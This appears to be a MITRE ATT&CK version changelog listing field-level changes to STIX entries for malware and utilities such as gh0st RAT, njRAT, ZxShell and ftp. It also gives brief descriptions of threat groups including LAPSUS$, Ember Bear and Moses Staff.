| external_references | {'source_name': 'Novetta Winnti April 2015', 'description': 'Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017.', 'url': 'http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf'} |
| Description |
|---|
| [XCSSET](https://attack.mitre.org/software/S0658) is a macOS modular backdoor that targets Xcode application developers. [XCSSET](https://attack.mitre.org/software/S0658) was first observed in August 2020 and has been used to install a backdoor component, modify browser applications, conduct collection, and provide ransomware-like encryption capabilities.(Citation: trendmicro xcsset xcode project 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-19 00:43:30.036000+00:00 | 2022-10-18 20:40:59.749000+00:00 |
| external_references[1]['source_name'] | XCSSET | OSX.DubRobber |
| external_references[1]['description'] | (Citation: trendmicro xcsset xcode project 2020) | (Citation: malwarebyteslabs xcsset dubrobber) |
| external_references[2]['source_name'] | OSX.DubRobber | XCSSET |
| external_references[2]['description'] | (Citation: malwarebyteslabs xcsset dubrobber) | (Citation: trendmicro xcsset xcode project 2020) |
| x_mitre_version | 1.0 | 1.2 |
| Old Description | New Description |
|---|---|
| [ZLib](https://attack.mitre.org/software/S0086) is a full-featured backdoor that was used as a second-stage implant by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2014 to 2015. It is malware and should not be confused with the compression library from which its name is derived. (Citation: Cylance Dust Storm) | [ZLib](https://attack.mitre.org/software/S0086) is a full-featured backdoor that was used as a second-stage implant during [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) since at least 2014. [ZLib](https://attack.mitre.org/software/S0086) is malware and should not be confused with the legitimate compression library from which its name is derived.(Citation: Cylance Dust Storm) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 02:44:21.378000+00:00 | 2022-09-30 20:52:00.462000+00:00 |
| description | [ZLib](https://attack.mitre.org/software/S0086) is a full-featured backdoor that was used as a second-stage implant by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2014 to 2015. It is malware and should not be confused with the compression library from which its name is derived. (Citation: Cylance Dust Storm) | [ZLib](https://attack.mitre.org/software/S0086) is a full-featured backdoor that was used as a second-stage implant during [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) since at least 2014. [ZLib](https://attack.mitre.org/software/S0086) is malware and should not be confused with the legitimate compression library from which its name is derived.(Citation: Cylance Dust Storm) |
| external_references[1]['description'] | Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017. | Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021. |
| external_references[1]['url'] | https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf | https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf |
| x_mitre_version | 1.1 | 1.2 |
| Old Description | New Description |
|---|---|
| [ZxShell](https://attack.mitre.org/software/S0412) is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 ) | [ZxShell](https://attack.mitre.org/software/S0412) is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 18:32:58.702000+00:00 | 2022-04-15 15:01:42.835000+00:00 |
| description | [ZxShell](https://attack.mitre.org/software/S0412) is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 ) | [ZxShell](https://attack.mitre.org/software/S0412) is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014) |
| external_references[1]['description'] | (Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 ) | (Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014) |
| external_references[2]['description'] | (Citation: Talos ZxShell Oct 2014 ) | (Citation: Talos ZxShell Oct 2014) |
| external_references[3]['source_name'] | FireEye APT41 Aug 2019 | Talos ZxShell Oct 2014 |
| external_references[3]['description'] | Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019. | Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019. |
| external_references[3]['url'] | https://content.fireeye.com/apt-41/rpt-apt41 | https://blogs.cisco.com/security/talos/opening-zxshell |
| external_references[4]['source_name'] | Talos ZxShell Oct 2014 | FireEye APT41 Aug 2019 |
| external_references[4]['description'] | Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019. | Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019. |
| external_references[4]['url'] | https://blogs.cisco.com/security/talos/opening-zxshell | https://content.fireeye.com/apt-41/rpt-apt41 |
| x_mitre_version | 1.1 | 1.2 |
| Old Description | New Description |
|---|---|
| [at](https://attack.mitre.org/software/S0110) is used to schedule tasks on a system to run at a specified date or time. (Citation: TechNet At) | [at](https://attack.mitre.org/software/S0110) is used to schedule tasks on a system to run at a specified date or time.(Citation: TechNet At)(Citation: Linux at) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 18:34:22.227000+00:00 | 2022-09-22 20:56:56.049000+00:00 |
| description | [at](https://attack.mitre.org/software/S0110) is used to schedule tasks on a system to run at a specified date or time. (Citation: TechNet At) | [at](https://attack.mitre.org/software/S0110) is used to schedule tasks on a system to run at a specified date or time.(Citation: TechNet At)(Citation: Linux at) |
| external_references[1]['source_name'] | TechNet At | Linux at |
| external_references[1]['description'] | Microsoft. (n.d.). At. Retrieved April 28, 2016. | IEEE/The Open Group. (2017). at(1p) — Linux manual page. Retrieved February 25, 2022. |
| external_references[1]['url'] | https://technet.microsoft.com/en-us/library/bb490866.aspx | https://man7.org/linux/man-pages/man1/at.1p.html |
| x_mitre_version | 1.1 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'TechNet At', 'description': 'Microsoft. (n.d.). At. Retrieved April 28, 2016.', 'url': 'https://technet.microsoft.com/en-us/library/bb490866.aspx'} |
| Description |
|---|
[cmd](https://attack.mitre.org/software/S0106) is the Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities. (Citation: TechNet Cmd)
Cmd.exe contains native functionality to perform many operations to interact with the system, including listing files in a directory (e.g., dir (Citation: TechNet Dir)), deleting files (e.g., del (Citation: TechNet Del)), and copying files (e.g., copy (Citation: TechNet Copy)). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-20 18:38:23.242000+00:00 | 2022-10-13 20:24:11.194000+00:00 |
| external_references[2]['source_name'] | TechNet Dir | TechNet Copy |
| external_references[2]['description'] | Microsoft. (n.d.). Dir. Retrieved April 18, 2016. | Microsoft. (n.d.). Copy. Retrieved April 26, 2016. |
| external_references[2]['url'] | https://technet.microsoft.com/en-us/library/cc755121.aspx | https://technet.microsoft.com/en-us/library/bb490886.aspx |
| external_references[4]['source_name'] | TechNet Copy | TechNet Dir |
| external_references[4]['description'] | Microsoft. (n.d.). Copy. Retrieved April 26, 2016. | Microsoft. (n.d.). Dir. Retrieved April 18, 2016. |
| external_references[4]['url'] | https://technet.microsoft.com/en-us/library/bb490886.aspx | https://technet.microsoft.com/en-us/library/cc755121.aspx |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| [dsquery](https://attack.mitre.org/software/S0105) is a command-line utility that can be used to query Active Directory for information from a system within a domain. (Citation: TechNet Dsquery) It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-18 20:01:55.739000+00:00 | 2022-10-13 13:34:53.355000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
| Old Description | New Description |
|---|---|
| [FTP](https://attack.mitre.org/software/S0095) is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data. (Citation: Wikipedia FTP) | [ftp](https://attack.mitre.org/software/S0095) is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data.(Citation: Microsoft FTP)(Citation: Linux FTP) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 16:25:40.125000+00:00 | 2022-03-07 22:20:18.809000+00:00 |
| name | FTP | ftp |
| description | [FTP](https://attack.mitre.org/software/S0095) is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data. (Citation: Wikipedia FTP) | [ftp](https://attack.mitre.org/software/S0095) is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data.(Citation: Microsoft FTP)(Citation: Linux FTP) |
| external_references[1]['source_name'] | Wikipedia FTP | Microsoft FTP |
| external_references[1]['description'] | Wikipedia. (2016, June 15). File Transfer Protocol. Retrieved July 20, 2016. | Microsoft. (2021, July 21). ftp. Retrieved February 25, 2022. |
| external_references[1]['url'] | https://en.wikipedia.org/wiki/File_Transfer_Protocol | https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ftp |
| x_mitre_aliases[0] | FTP | ftp |
| x_mitre_version | 1.1 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Linux FTP', 'description': 'N/A. (n.d.). ftp(1) - Linux man page. Retrieved February 25, 2022.', 'url': 'https://linux.die.net/man/1/ftp'} |
| Old Description | New Description |
|---|---|
| [gh0st RAT](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by multiple groups. (Citation: FireEye Hacking Team)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgroup Gh0st April 2018) | [gh0st RAT](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by multiple groups.(Citation: FireEye Hacking Team)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgroup Gh0st April 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html | |
| external_references | https://www.arbornetworks.com/blog/asert/musical-chairs-playing-tetris/ |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-23 20:43:13.190000+00:00 | 2022-09-30 21:03:21.873000+00:00 |
| description | [gh0st RAT](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by multiple groups. (Citation: FireEye Hacking Team)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgroup Gh0st April 2018) | [gh0st RAT](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by multiple groups.(Citation: FireEye Hacking Team)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgroup Gh0st April 2018) |
| external_references[2]['source_name'] | FireEye Hacking Team | Mydoor |
| external_references[2]['description'] | FireEye Threat Intelligence. (2015, July 13). Demonstrating Hustle, Chinese APT Groups Quickly Use Zero-Day Vulnerability (CVE-2015-5119) Following Hacking Team Leak. Retrieved January 25, 2016. | (Citation: Novetta-Axiom) |
| external_references[3]['source_name'] | Arbor Musical Chairs Feb 2018 | Moudoor |
| external_references[3]['description'] | Sabo, S. (2018, February 15). Musical Chairs Playing Tetris. Retrieved February 19, 2018. | (Citation: Novetta-Axiom) |
| external_references[4]['source_name'] | Nccgroup Gh0st April 2018 | FireEye Hacking Team |
| external_references[4]['description'] | Pantazopoulos, N. (2018, April 17). Decoding network data from a Gh0st RAT variant. Retrieved November 2, 2018. | FireEye Threat Intelligence. (2015, July 13). Demonstrating Hustle, Chinese APT Groups Quickly Use Zero-Day Vulnerability (CVE-2015-5119) Following Hacking Team Leak. Retrieved January 25, 2016. |
| external_references[4]['url'] | https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/ | https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html |
| x_mitre_version | 2.3 | 3.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Novetta-Axiom', 'description': 'Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.', 'url': 'http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf'} | |
| external_references | {'source_name': 'Nccgroup Gh0st April 2018', 'description': 'Pantazopoulos, N. (2018, April 17). Decoding network data from a Gh0st RAT variant. Retrieved November 2, 2018.', 'url': 'https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/'} | |
| external_references | {'source_name': 'Arbor Musical Chairs Feb 2018', 'description': 'Sabo, S. (2018, February 15). Musical Chairs Playing Tetris. Retrieved February 19, 2018.', 'url': 'https://www.arbornetworks.com/blog/asert/musical-chairs-playing-tetris/'} | |
| x_mitre_aliases | Mydoor | |
| x_mitre_aliases | Moudoor |
| Description |
|---|
| [gsecdump](https://attack.mitre.org/software/S0008) is a publicly-available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems. (Citation: TrueSec Gsecdump) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 18:35:48.851000+00:00 | 2022-09-22 20:55:32.937000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| [ipconfig](https://attack.mitre.org/software/S0100) is a Windows utility that can be used to find information about a system's TCP/IP, DNS, DHCP, and adapter configuration. (Citation: TechNet Ipconfig) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | ['Windows'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2022-10-12 21:28:49.335000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_aliases | ipconfig.exe |
| Description |
|---|
| [netstat](https://attack.mitre.org/software/S0104) is an operating system utility that displays active TCP connections, listening ports, and network statistics. (Citation: TechNet Netstat) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | ['Windows', 'Linux', 'macOS'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2022-10-12 21:29:16.407000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_aliases | netstat.exe |
| Description |
|---|
| [njRAT](https://attack.mitre.org/software/S0385) is a remote access tool (RAT) that was first observed in 2012. It has been used by threat actors in the Middle East.(Citation: Fidelis njRAT June 2013) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | https://www.fireeye.com/blog/threat-research/2013/08/njw0rm-brother-from-the-same-mother.html |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/ |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-14 22:25:02.713000+00:00 | 2022-09-16 19:33:56.130000+00:00 |
| external_references[1]['source_name'] | Njw0rm | LV |
| external_references[1]['description'] | Some sources have discussed Njw0rm as a later variant of njRAT, where Njw0rm adds the ability to spread via removable devices such as USB drives.(Citation: FireEye Njw0rm Aug 2013) Other sources contain that functionality in their description of njRAT itself.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018) | (Citation: Fidelis njRAT June 2013) |
| external_references[2]['source_name'] | LV | Bladabindi |
| external_references[2]['description'] | (Citation: Fidelis njRAT June 2013) | (Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018) |
| external_references[3]['source_name'] | Bladabindi | FireEye Njw0rm Aug 2013 |
| external_references[3]['description'] | (Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018) | Dawda, U. and Villeneuve, N. (2013, August 30). Njw0rm - Brother From the Same Mother. Retrieved June 4, 2019. |
| external_references[5]['source_name'] | FireEye Njw0rm Aug 2013 | Trend Micro njRAT 2018 |
| external_references[5]['description'] | Dawda, U. and Villeneuve, N. (2013, August 30). Njw0rm - Brother From the Same Mother. Retrieved June 4, 2019. | Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019. |
| external_references[5]['url'] | https://www.fireeye.com/blog/threat-research/2013/08/njw0rm-brother-from-the-same-mother.html | https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/ |
| external_references[6]['source_name'] | Trend Micro njRAT 2018 | Njw0rm |
| external_references[6]['description'] | Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019. | Some sources have discussed Njw0rm as a later variant of [njRAT](https://attack.mitre.org/software/S0385), where Njw0rm adds the ability to spread via removable devices such as USB drives.(Citation: FireEye Njw0rm Aug 2013) Other sources contain that functionality in their description of [njRAT](https://attack.mitre.org/software/S0385) itself.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018) |
| x_mitre_version | 1.2 | 1.4 |
| Description |
|---|
| [route](https://attack.mitre.org/software/S0103) can be used to find or change information within the local system IP routing table. (Citation: TechNet Route) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_aliases | ['route', 'route.exe'] | |
| x_mitre_platforms | ['Linux', 'Windows', 'macOS'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2022-04-06 15:27:00.668000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [schtasks](https://attack.mitre.org/software/S0111) is used to schedule execution of programs or scripts on a Windows system to run at a specific date and time. (Citation: TechNet Schtasks) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-31 12:42:36.620000+00:00 | 2022-04-20 20:04:22.896000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| Old Description | New Description |
|---|---|
| [zwShell](https://attack.mitre.org/software/S0350) is a remote access tool (RAT) written in Delphi that has been used by [Night Dragon](https://attack.mitre.org/groups/G0014).(Citation: McAfee Night Dragon) | [zwShell](https://attack.mitre.org/software/S0350) is a remote access tool (RAT) written in Delphi that has been seen in the wild since the spring of 2010 and used by threat actors during [Night Dragon](https://attack.mitre.org/campaigns/C0002).(Citation: McAfee Night Dragon) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-06-16 15:50:05.015000+00:00 | 2022-09-22 00:38:34.857000+00:00 |
| description | [zwShell](https://attack.mitre.org/software/S0350) is a remote access tool (RAT) written in Delphi that has been used by [Night Dragon](https://attack.mitre.org/groups/G0014).(Citation: McAfee Night Dragon) | [zwShell](https://attack.mitre.org/software/S0350) is a remote access tool (RAT) written in Delphi that has been seen in the wild since the spring of 2010 and used by threat actors during [Night Dragon](https://attack.mitre.org/campaigns/C0002).(Citation: McAfee Night Dragon) |
| x_mitre_version | 1.1 | 2.0 |
| Description |
|---|
| [Aoqin Dragon](https://attack.mitre.org/groups/G1007) is a suspected Chinese cyber espionage threat group that has been active since at least 2013. [Aoqin Dragon](https://attack.mitre.org/groups/G1007) has primarily targeted government, education, and telecommunication organizations in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. Security researchers noted a potential association between [Aoqin Dragon](https://attack.mitre.org/groups/G1007) and UNC94, based on malware, infrastructure, and targets.(Citation: SentinelOne Aoqin Dragon June 2022) |
| Description |
|---|
| [Aquatic Panda](https://attack.mitre.org/groups/G0143) is a suspected China-based threat group with a dual mission of intelligence collection and industrial espionage. Active since at least May 2020, [Aquatic Panda](https://attack.mitre.org/groups/G0143) has primarily targeted entities in the telecommunications, technology, and government sectors.(Citation: CrowdStrike AQUATIC PANDA December 2021) |
| Description |
|---|
| [BITTER](https://attack.mitre.org/groups/G1002) is a suspected South Asian cyber espionage threat group that has been active since at least 2013. [BITTER](https://attack.mitre.org/groups/G1002) has primarily targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016) |
| Description |
|---|
| [Confucius](https://attack.mitre.org/groups/G0142) is a cyber espionage group that has primarily targeted military personnel, high-profile personalities, business persons, and government organizations in South Asia since at least 2013. Security researchers have noted similarities between [Confucius](https://attack.mitre.org/groups/G0142) and [Patchwork](https://attack.mitre.org/groups/G0040), particularly in their respective custom malware code and targets.(Citation: TrendMicro Confucius APT Feb 2018)(Citation: TrendMicro Confucius APT Aug 2021)(Citation: Uptycs Confucius APT Jan 2021) |
| Description |
|---|
| [EXOTIC LILY](https://attack.mitre.org/groups/G1011) is a financially motivated group that has been closely linked with [Wizard Spider](https://attack.mitre.org/groups/G0102) and the deployment of ransomware including [Conti](https://attack.mitre.org/software/S0575) and [Diavol](https://attack.mitre.org/software/S0659). [EXOTIC LILY](https://attack.mitre.org/groups/G1011) may be acting as an initial access broker for other malicious actors, and has targeted a wide range of industries including IT, cybersecurity, and healthcare since at least September 2021.(Citation: Google EXOTIC LILY March 2022) |
| Description |
|---|
| [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) |
| Description |
|---|
| [Ember Bear](https://attack.mitre.org/groups/G1003) is a suspected Russian state-sponsored cyber espionage group that has been active since at least March 2021. [Ember Bear](https://attack.mitre.org/groups/G1003) has primarily focused their operations against Ukraine and Georgia, but has also targeted Western European and North American foreign ministries, pharmaceutical companies, and financial sector organizations. Security researchers assess [Ember Bear](https://attack.mitre.org/groups/G1003) likely conducted the [WhisperGate](https://attack.mitre.org/software/S0689) destructive wiper attacks against Ukraine in early 2022.(Citation: CrowdStrike Ember Bear Profile March 2022)(Citation: Mandiant UNC2589 March 2022)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ) |
| Description |
|---|
| [Gelsemium](https://attack.mitre.org/groups/G0141) is a cyberespionage group that has been active since at least 2014, targeting governmental institutions, electronics manufacturers, universities, and religious organizations in East Asia and the Middle East.(Citation: ESET Gelsemium June 2021) |
| Description |
|---|
| [HEXANE](https://attack.mitre.org/groups/G1001) is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. [HEXANE](https://attack.mitre.org/groups/G1001)'s TTPs appear similar to [APT33](https://attack.mitre.org/groups/G0064) and [OilRig](https://attack.mitre.org/groups/G0049) but due to differences in victims and tools it is tracked as a separate entity.(Citation: Dragos Hexane)(Citation: Kaspersky Lyceum October 2021)(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021) |
| Description |
|---|
| [LAPSUS$](https://attack.mitre.org/groups/G1004) is cyber criminal threat group that has been active since at least mid-2021. [LAPSUS$](https://attack.mitre.org/groups/G1004) specializes in large-scale social engineering and extortion operations, including destructive attacks without the use of ransomware. The group has targeted organizations globally, including in the government, manufacturing, higher education, energy, healthcare, technology, telecommunications, and media sectors.(Citation: BBC LAPSUS Apr 2022)(Citation: MSTIC DEV-0537 Mar 2022)(Citation: UNIT 42 LAPSUS Mar 2022) |
| Description |
|---|
| [LazyScripter](https://attack.mitre.org/groups/G0140) is threat group that has mainly targeted the airlines industry since at least 2018, primarily using open-source toolsets.(Citation: MalwareBytes LazyScripter Feb 2021) |
| Description |
|---|
| [Moses Staff](https://attack.mitre.org/groups/G1009) is a suspected Iranian threat group that has primarily targeted Israeli companies since at least September 2021. [Moses Staff](https://attack.mitre.org/groups/G1009) openly stated their motivation in attacking Israeli companies is to cause damage by leaking stolen sensitive data and encrypting the victim's networks without a ransom demand.(Citation: Checkpoint MosesStaff Nov 2021) Security researchers assess [Moses Staff](https://attack.mitre.org/groups/G1009) is politically motivated, and has targeted government, finance, travel, energy, manufacturing, and utility companies outside of Israel as well, including those in Italy, India, Germany, Chile, Turkey, the UAE, and the US.(Citation: Cybereason StrifeWater Feb 2022) |
| Description |
|---|
